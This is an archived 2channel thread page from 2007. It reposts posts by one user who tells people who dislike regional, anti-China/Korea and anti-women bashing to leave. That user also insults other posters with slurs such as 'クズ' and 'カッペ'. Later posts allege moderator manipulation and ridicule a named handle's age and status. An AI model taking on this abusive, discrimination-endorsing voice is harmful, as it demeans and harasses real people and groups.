874 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 11:05:54 ID:91pAh7rN0
>>847
>>869
m9(^Д^)
地域叩き、特ア叩き、女叩きその他無知と偏見に基づく差別叩きが嫌なら
ニュー速から出て行け

944 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 11:47:47 ID:91pAh7rN0
>>934
>>936
地域叩き、特ア叩き、女叩きその他無知と偏見に基づく差別叩きが嫌なら
ニュー速から出て行け

これからは+も地域だしたいのう
ニュースカテ全般地域出せばいいんじゃ。ついでVIPも


106 :最低人類0号:2007/12/02(日) 12:00:13 ID:mUp+Swj6
949 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 11:49:53 ID:91pAh7rN0
そもそも地域やめてくれとかいうヘタレが
2chにいる事自体間違い
アホー板にでも池クズ

955 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 11:52:08 ID:91pAh7rN0
まさにnamidameプゲラ

958 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 11:54:09 ID:91pAh7rN0
>>952
メンドクセンダヨ バーカ キエロクズ
カッペクセエ プゲラ
>>929
もっともらしく言ってんじゃねーよクズ
つまんねんだよお前が反応しなきゃいいだろうがカッペ野郎

963 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 11:56:11 ID:91pAh7rN0
>>957
FOXに言え
そんな事イチイチシルカハゲ
7割合ってんだから問題ネーンジャボケ
狐の実験場でワカワカンネエ事ホザイテンジャネーヨ

967 名前:動け動けウゴウゴ2ちゃんねる [] 投稿日:2007/12/02(日) 11:58:19 ID:91pAh7rN0
いやなら+逝けよバーカアホカ
---------
うが繋ぎなおしてID変更w
【涙目】ニュース速報@運用情報48【ν】
http://qb5.2ch.net/test/read.cgi/operate/1196528902/970
970 名前:(●‘_‘)ぶびぃ ◆oX1mxy.8KA [] 投稿日:2007/12/02(日) 11:59:07 ID:FF3I17lE0
どんな実験にも堪え忍ぶのが
正しいν即民の姿です・・・

107 :最低人類0号:2007/12/02(日) 12:01:39 ID:dKp6JFmv
2ちゃん規制担当者 裏技工作に失敗して  ばれた瞬間ですよ
http://ex21.2ch.net/test/read.cgi/accuse/1196355741/l50#tag953

ここの  見て
933
これを書き込んだ5秒後更新したら

935
すぐさまこのカキコがはいってやがったw
あれだけ言っていきなりかよとタイミングが
おなじぐらいだったらしく  おいらがカキコしたときとね

そしてwwwww  何秒かな更新押したら>>934がいきなり現れて
レスを上下いれかえ工作の裏技をみてしまったw  時間までもが
工作できることがあったwwww  規制担当者はミスを犯した

相当   933は  がムカついたみたいだねwww あ〜こえこえwww
おいらが規制になったら 本物のジャイアンみたいなやつだから怒らせるなよw

このレスはスリーしといてください^^スレ立てできないため ここに残しとくだけ

108 :最低人類0号:2007/12/02(日) 12:15:35 ID:VPgXvKXC
いつもながら酷いな、ぶびぃ(笑)

古参気取ったカキコとかw
あんた元々ラウンコから流れてきたじゃないッスかw
しかもなれ合い命のラウンコでシカトされてww

なにが狐の実験場だ!だw

古参コテ知ってるふりして話しかけて「誰だっけ」とか言われたり。
恥ずかしすぎだねw
その人らが現役んときほとんどからんでなかったし、そもそも相手にされてなかったじゃないッスかw


これで30代半ばなんだぜ?

109 :最低人類0号:2007/12/02(日) 12:18:51 ID:mUp+Swj6
なんで名無しでもうがの書き込みってすぐわかるんだろうなw
あいつわざとわかるように書き込んでるとしか思えねえw


110 :最低人類0号:2007/12/03(月) 07:08:53 ID:wSEi/g3v
クララも貼ってあって全盛期の裏雑にちょっと戻った感じになってるなw

111 :最低人類0号:2007/12/03(月) 07:26:34 ID:sFWqJbQH
裏雑といっても昔のコテを追いかけてるスレだからな
やつらが帰ってくればまた盛り上がる
正直今のコテはほとんどわかんね

112 :最低人類0号:2007/12/03(月) 11:13:07 ID:qbXjWH2P
クララおもしれーなw

34 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)